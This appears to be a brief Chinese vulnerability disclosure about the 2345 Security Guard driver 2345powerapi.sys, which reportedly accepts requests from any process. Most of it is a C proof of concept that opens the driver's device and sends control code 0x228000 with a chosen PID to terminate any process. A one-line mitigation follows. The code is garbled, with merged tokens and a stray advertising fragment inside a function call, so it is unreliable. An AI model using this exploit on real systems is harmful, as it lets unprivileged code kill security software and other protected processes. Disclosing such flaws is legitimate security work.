2345安全卫士安装的2345powerapi.sys驱动程序,不会校验打开其设备对象的进程。导致任意具有打开设备对象权限的进程,都能使用其驱动中的功能。既然叫powerapi一定是很好很强大。我就试了一个关闭任意进程。其他的未测试。
//#include <Windows.h>#define CONTROLCODE1 0x228000HANDLE OpenDevice(TCHAR *devName){HANDLE hDev = CreateFile(devName, GENERIC_ALL, FILE_SHARE_READ (专业提供下载)
FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);return hDev;}void CloseDevice(HANDLE hDev){CloseHandle(hDev);}int SendMessageToDev(HANDLE hDev, DWORD dwIoControlCode, BYTE *inBuffer, DWORD inBufferSize, BYTE *outBuffer, DWORD outBufferSize){DWORD outLength;BOOL ret = DeviceIoControl(hDev, dwIoControlCode, inBuffer, inBufferSize, outBuffer, outBufferSize, &outLength, NULL);if (ret)return outLength;elsereturn -1;}void Poc(){HANDLE hDev = OpenDevice(_T("\\\\.\\2345PowerApi"));if (hDev == INVALID_HANDLE_VALUE) {printf("[-] Open device failed!gle:%d\n", GetLastError());return;}DWORD pid = 4;printf("Input pid:\n\t");scanf_s("%d", &pid);int ret = SendMessageToDev(hDev, CONTROLCODE1, (BYTE *)&pid, 4, NULL, 0);if (ret < 0) {printf("[-]Control device failed, gle:%d.\n", GetLastError());return;}CloseDevice(hDev);printf("[*]Ok!\n");return;}int _tmain(int argc, _TCHAR* argv[]){Poc();return 0;}
解决方案:严格限制能使用本驱动的进程
……